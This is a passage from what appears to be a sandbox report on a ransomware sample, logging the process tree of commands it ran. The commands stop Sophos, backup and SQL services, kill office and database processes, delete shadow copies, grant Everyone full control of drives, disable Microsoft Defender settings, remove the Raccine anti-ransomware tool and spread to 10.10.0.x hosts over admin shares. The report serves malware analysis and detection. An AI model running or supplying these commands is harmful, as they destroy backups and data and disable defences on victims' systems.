    PID:4556
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
    3⤵
    PID:5392
- - C:\Windows\system32\arp.exe
    "arp" -a
    3⤵
    PID:5888
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\Users
    3⤵
    PID:5296
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\A$
    3⤵
    PID:5472
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\B$
    3⤵
    PID:3356
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\C$
    3⤵
    PID:4472
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\D$
    3⤵
    PID:4824
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\E$
    3⤵
    PID:5024
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\F$
    3⤵
    PID:4428
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\G$
    3⤵
    PID:5496
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.128\H$
    3⤵
    PID:5048
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.128\I$
    3⤵
    PID:5336
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.128\J$
    3⤵
    PID:3720
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.128\K$
    3⤵
    PID:4884
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.128\L$
    3⤵
    PID:4192
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.128\M$
    3⤵
    PID:2848
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.128\N$
    3⤵
    PID:1220
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.128\O$
    3⤵
    PID:1700
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.128\P$
    3⤵
    PID:5112
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.128\Q$
    3⤵
    PID:4776
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.129\R$
    3⤵
    PID:4200
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.129\S$
    3⤵
    PID:6080
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos Safestore Service” /y
    3⤵
    PID:5072
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos Safestore Service” /y
      4⤵
      PID:5836
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.129\T$
    3⤵
    PID:3912
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecAgentBrowser /y
    3⤵
    PID:4948
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
      4⤵
      PID:3552
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.129\U$
    3⤵
    PID:3884
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$PRACTICEMGT /y
    3⤵
    PID:4376
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
      4⤵
      PID:6044
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.129\V$
    3⤵
    PID:4588
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos System Protection Service” /y
    3⤵
    PID:5184
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos System Protection Service” /y
      4⤵
      PID:5416
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.129\W$
    3⤵
    PID:5136
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecDeviceMediaService /y
    3⤵
    PID:4856
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
      4⤵
      PID:2272
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.129\X$
    3⤵
    PID:916
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$PRACTTICEBGC /y
    3⤵
    PID:5208
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
      4⤵
      PID:4696
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.129\Y$
    3⤵
    PID:5376
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos Web Control Service” /y
    3⤵
    PID:5564
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos Web Control Service” /y
      4⤵
      PID:4536
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.129\Z$
    3⤵
    PID:2156
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecJobEngine /y
    3⤵
    PID:5452
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecJobEngine /y
      4⤵
      PID:5568
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$PROD /y
    3⤵
    PID:1660
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$PROD /y
      4⤵
      PID:6016
- - C:\Windows\system32\net.exe
    "net.exe" stop AcronisAgent /y
    3⤵
    PID:3100
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop AcronisAgent /y
      4⤵
      PID:5272
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecManagementService /y
    3⤵
    PID:5844
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecManagementService /y
      4⤵
      PID:4196
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$PROFXENGAGEMENT /y
    3⤵
    PID:5924
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
      4⤵
      PID:2836
- - C:\Windows\system32\net.exe
    "net.exe" stop Antivirus /y
    3⤵
    PID:4220
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop Antivirus /y
      4⤵
      PID:2348
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecRPCService /y
    3⤵
    PID:4732
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecRPCService /y
      4⤵
      PID:5840
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    PID:5088
- - C:\Windows\TEMP\nfzmwfvd.exe
    "C:\Windows\TEMP\nfzmwfvd.exe" \\10.10.0.36 -d -h -s -f -accepteula -nobanner -c "C:\Windows\47b51b615fe22292caf30a30a4d4057cf57a283a61045190b2a2331b763b6125.bin.sample.exe"
    3⤵
    PID:6128
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    - Kills process with taskkill
    PID:1832
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopservice.exe /F
    3⤵
    - Kills process with taskkill
    PID:5608
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld.exe /F
    3⤵
    - Kills process with taskkill
    PID:4044
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqbcoreservice.exe /F
    3⤵
    - Kills process with taskkill
    PID:5984
- - C:\Windows\TEMP\nfzmwfvd.exe
    "C:\Windows\TEMP\nfzmwfvd.exe" \\10.10.0.38 -d -h -s -f -accepteula -nobanner -c "C:\Windows\47b51b615fe22292caf30a30a4d4057cf57a283a61045190b2a2331b763b6125.bin.sample.exe"
    3⤵
    PID:5008
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4496
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM firefoxconfig.exe /F
    3⤵
    PID:1088
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\Users
    3⤵
    PID:4736
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM agntsvc.exe /F
    3⤵
    - Kills process with taskkill
    PID:4880
- - C:\Windows\TEMP\nfzmwfvd.exe
    "C:\Windows\TEMP\nfzmwfvd.exe" \\10.10.0.39 -d -h -s -f -accepteula -nobanner -c "C:\Windows\47b51b615fe22292caf30a30a4d4057cf57a283a61045190b2a2331b763b6125.bin.sample.exe"
    3⤵
    PID:4868
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM thebat.exe /F
    3⤵
    - Kills process with taskkill
    PID:4964
- - C:\Windows\TEMP\nfzmwfvd.exe
    "C:\Windows\TEMP\nfzmwfvd.exe" \\10.10.0.10 -d -h -s -f -accepteula -nobanner -c "C:\Windows\47b51b615fe22292caf30a30a4d4057cf57a283a61045190b2a2331b763b6125.bin.sample.exe"
    3⤵
    PID:3960
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM steam.exe /F
    3⤵
    - Kills process with taskkill
    PID:4472
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM encsvc.exe /F
    3⤵
    - Kills process with taskkill
    PID:5896
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM excel.exe /F
    3⤵
    - Kills process with taskkill
    PID:5724
- - C:\Windows\TEMP\nfzmwfvd.exe
    "C:\Windows\TEMP\nfzmwfvd.exe" \\10.10.0.41 -d -h -s -f -accepteula -nobanner -c "C:\Windows\47b51b615fe22292caf30a30a4d4057cf57a283a61045190b2a2331b763b6125.bin.sample.exe"
    3⤵
    PID:4668
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM CNTAoSMgr.exe /F
    3⤵
    PID:5004
- - C:\Windows\TEMP\nfzmwfvd.exe
    "C:\Windows\TEMP\nfzmwfvd.exe" \\10.10.0.11 -d -h -s -f -accepteula -nobanner -c "C:\Windows\47b51b615fe22292caf30a30a4d4057cf57a283a61045190b2a2331b763b6125.bin.sample.exe"
    3⤵
    PID:4844
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlwriter.exe /F
    3⤵
    PID:4260
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM tbirdconfig.exe /F
    3⤵
    - Kills process with taskkill
    PID:1680
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM dbeng50.exe /F
    3⤵
    PID:4344
- - C:\Windows\TEMP\nfzmwfvd.exe
    "C:\Windows\TEMP\nfzmwfvd.exe" \\10.10.0.21 -d -h -s -f -accepteula -nobanner -c "C:\Windows\47b51b615fe22292caf30a30a4d4057cf57a283a61045190b2a2331b763b6125.bin.sample.exe"
    3⤵
    PID:1392
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM thebat64.exe /F
    3⤵
    - Kills process with taskkill
    PID:5176
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM ocomm.exe /F
    3⤵
    - Kills process with taskkill
    PID:5268
- - C:\Windows\TEMP\nfzmwfvd.exe
    "C:\Windows\TEMP\nfzmwfvd.exe" \\10.10.0.24 -d -h -s -f -accepteula -nobanner -c "C:\Windows\47b51b615fe22292caf30a30a4d4057cf57a283a61045190b2a2331b763b6125.bin.sample.exe"
    3⤵
    PID:5384
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM infopath.exe /F
    3⤵
    PID:4672
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mbamtray.exe /F
    3⤵
    - Kills process with taskkill
    PID:5312
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM zoolz.exe /F
    3⤵
    - Kills process with taskkill
    PID:1288
- - C:\Windows\TEMP\nfzmwfvd.exe
    "C:\Windows\TEMP\nfzmwfvd.exe" \\10.10.0.27 -d -h -s -f -accepteula -nobanner -c "C:\Windows\47b51b615fe22292caf30a30a4d4057cf57a283a61045190b2a2331b763b6125.bin.sample.exe"
    3⤵
    PID:3736
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" IM thunderbird.exe /F
    3⤵
    - Kills process with taskkill
    PID:6044
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM dbsnmp.exe /F
    3⤵
    - Kills process with taskkill
    PID:4716
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM xfssvccon.exe /F
    3⤵
    PID:5416
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    PID:4752
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld-opt.exe /F
    3⤵
    PID:1608
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM Ntrtscan.exe /F
    3⤵
    PID:4448
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM ocautoupds.exe /F
    3⤵
    PID:4512
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM isqlplussvc.exe /F
    3⤵
    - Kills process with taskkill
    PID:5552
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM ocssd.exe /F
    3⤵
    - Kills process with taskkill
    PID:6000
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM onenote.exe /F
    3⤵
    - Kills process with taskkill
    PID:5568
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM oracle.exe /F
    3⤵
    - Kills process with taskkill
    PID:1448
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM PccNTMon.exe /F
    3⤵
    - Kills process with taskkill
    PID:4380
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlagent.exe /F
    3⤵
    PID:2516
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM msaccess.exe /F
    3⤵
    PID:5972
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlbrowser.exe /F
    3⤵
    - Kills process with taskkill
    PID:4900
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM outlook.exe /F
    3⤵
    PID:4680
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlservr.exe /F
    3⤵
    PID:4480
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM tmlisten.exe /F
    3⤵
    PID:4508
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM synctime.exe /F
    3⤵
    - Kills process with taskkill
    PID:3912
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM msftesql.exe /F
    3⤵
    - Kills process with taskkill
    PID:3884
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM powerpnt.exe /F
    3⤵
    - Kills process with taskkill
    PID:4004
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    - Kills process with taskkill
    PID:1464
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM visio.exe /F
    3⤵
    PID:5668
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopservice.exe /F
    3⤵
    - Kills process with taskkill
    PID:3236
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM winword.exe /F
    3⤵
    - Kills process with taskkill
    PID:4228
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld-nt.exe /F
    3⤵
    - Kills process with taskkill
    PID:2120
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM wordpad.exe /F
    3⤵
    PID:4980
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
    3⤵
    PID:6132
- - C:\Windows\system32\icacls.exe
    "icacls" "C:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:1808
- - C:\Windows\system32\icacls.exe
    "icacls" "D:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3212
- - C:\Windows\system32\icacls.exe
    "icacls" "Z:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:5872
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.15\Users
    3⤵
    PID:4984
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.18\Users
    3⤵
    PID:4368
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.21\Users
    3⤵
    PID:5584
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.24\Users
    3⤵
    PID:3636
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.27\Users
    3⤵
    PID:5440
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.30\Users
    3⤵
    PID:4156
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.33\Users
    3⤵
    PID:5248
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.36\Users
    3⤵
    PID:4968
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.36\A$
    3⤵
    PID:5176
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.36\N$
    3⤵
    PID:4784
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.36\B$
    3⤵
    PID:4860
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.36\O$
    3⤵
    PID:5420
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.36\C$
    3⤵
    PID:4280
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.36\P$
    3⤵
    PID:5604
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.36\D$
    3⤵
    PID:5600
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.36\Q$
    3⤵
    PID:4644
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.36\E$
    3⤵
    PID:5116

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s FDResPub
1⤵
PID:5916

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s upnphost
1⤵
PID:4008

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
1⤵
PID:5776

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
1⤵
PID:6028

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
1⤵
PID:2040

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
1⤵
PID:4228

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
1⤵
PID:2196

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
1⤵
PID:5960

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop wbengine /y
1⤵
PID:4728

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop wbengine /y
1⤵
PID:4700

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MsDtsServer /y
1⤵
PID:4624

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
1⤵
PID:5148

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfevtp /y
1⤵
PID:2328

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
- Suspicious use of WriteProcessMemory
PID:4572

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
1⤵
PID:5996

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos File Scanner Service” /y
1⤵
PID:5064

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
1⤵
PID:5232

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop TmCCSF /y
1⤵
PID:1092

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop klnagent /y
1⤵
PID:280

C:\Windows\PAExec-2104-RJMQBVDN.exe
C:\Windows\PAExec-2104-RJMQBVDN.exe -service
1⤵
PID:5132
- C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
  "C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe"
  2⤵
  PID:5432
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled
    3⤵
    PID:4472
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" Get-MpPreference -verbose
    3⤵
    PID:5176
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
    3⤵
    PID:4316
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
    3⤵
    PID:5816
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
    3⤵
    PID:5236
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
    3⤵
    PID:184
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
    3⤵
    PID:4696
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
    3⤵
    PID:4324
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
    3⤵
    PID:3148
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
    3⤵
    PID:4772
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
    3⤵
    PID:5420
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
    3⤵
    PID:3352
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
    3⤵
    PID:5088
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    PID:3912
- - C:\Windows\system32\taskkill.exe
    "taskkill" /F /IM RaccineSettings.exe
    3⤵
    PID:4156
- - C:\Windows\system32\reg.exe
    "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
    3⤵
    PID:5992
- - C:\Windows\system32\reg.exe
    "reg" delete HKCU\Software\Raccine /F
    3⤵
    - Modifies registry key
    PID:4124
- - C:\Windows\system32\schtasks.exe
    "schtasks" /DELETE /TN "Raccine Rules Updater" /F
    3⤵
    PID:5996
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:2116
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLTELEMETRY start= disabled
    3⤵
    PID:264
- - C:\Windows\system32\sc.exe
    "sc.exe" config Dnscache start= auto
    3⤵
    PID:4340
- - C:\Windows\system32\sc.exe
    "sc.exe" config FDResPub start= auto
    3⤵
    PID:5068
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
    3⤵
    PID:4908
- - C:\Windows\system32\sc.exe
    "sc.exe" config SstpSvc start= disabled
    3⤵
    PID:5532
- - C:\Windows\system32\sc.exe
    "sc.exe" config SSDPSRV start= auto
    3⤵
    PID:1184
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLWriter start= disabled
    3⤵
    PID:4456
- - C:\Windows\system32\sc.exe
    "sc.exe" config upnphost start= auto
    3⤵
    PID:2148
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    - Kills process with taskkill
    PID:2120
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM synctime.exe /F
    3⤵
    - Kills process with taskkill
    PID:4172
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    - Kills process with taskkill
    PID:5028
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    - Kills process with taskkill
    PID:5884
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM Ntrtscan.exe /F
    3⤵
    - Kills process with taskkill
    PID:5436
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopservice.exe /F
    3⤵
    - Kills process with taskkill
    PID:1464
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM isqlplussvc.exe /F
    3⤵
    - Kills process with taskkill
    PID:2392
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqbcoreservice.exe /F
    3⤵
    - Kills process with taskkill
    PID:4924
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM agntsvc.exe /F
    3⤵
    - Kills process with taskkill
    PID:4936
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld.exe /F
    3⤵
    - Kills process with taskkill
    PID:1136
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM PccNTMon.exe /F
    3⤵
    - Kills process with taskkill
    PID:4428
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM onenote.exe /F
    3⤵
    PID:5668
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM firefoxconfig.exe /F
    3⤵
    PID:5024
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM thebat.exe /F
    3⤵
    PID:4608
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM msaccess.exe /F
    3⤵
    PID:4568
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM outlook.exe /F
    3⤵
    - Kills process with taskkill
    PID:3708
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM steam.exe /F
    3⤵
    - Kills process with taskkill
    PID:1680
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlwriter.exe /F
    3⤵
    - Kills process with taskkill
    PID:3040
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM ocomm.exe /F
    3⤵
    - Kills process with taskkill
    PID:2096
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    - Kills process with taskkill
    PID:2600
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM tmlisten.exe /F
    3⤵
    PID:6044
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM encsvc.exe /F
    3⤵
    PID:4740
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM tbirdconfig.exe /F
    3⤵
    - Kills process with taskkill
    PID:5116
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM infopath.exe /F
    3⤵
    PID:3908
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM visio.exe /F
    3⤵
    PID:4764
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM msftesql.exe /F
    3⤵
    PID:5764
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM excel.exe /F
    3⤵
    PID:5472
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM dbeng50.exe /F
    3⤵
    - Kills process with taskkill
    PID:5228
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopservice.exe /F
    3⤵
    - Kills process with taskkill
    PID:5240
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
    3⤵
    PID:2732
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mbamtray.exe /F
    3⤵
    PID:5708
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM powerpnt.exe /F
    3⤵
    PID:4360
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM CNTAoSMgr.exe /F
    3⤵
    - Kills process with taskkill
    PID:3372
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM thebat64.exe /F
    3⤵
    - Kills process with taskkill
    PID:3984
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM winword.exe /F
    3⤵
    PID:4352
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" IM thunderbird.exe /F
    3⤵
    - Kills process with taskkill
    PID:4336
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM dbsnmp.exe /F
    3⤵
    - Kills process with taskkill
    PID:4696
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM zoolz.exe /F
    3⤵
    - Kills process with taskkill
    PID:272
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld-nt.exe /F
    3⤵
    - Kills process with taskkill
    PID:3332
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlservr.exe /F
    3⤵
    - Kills process with taskkill
    PID:5272
- - C:\Windows\system32\arp.exe
    "arp" -a
    3⤵
    PID:5152
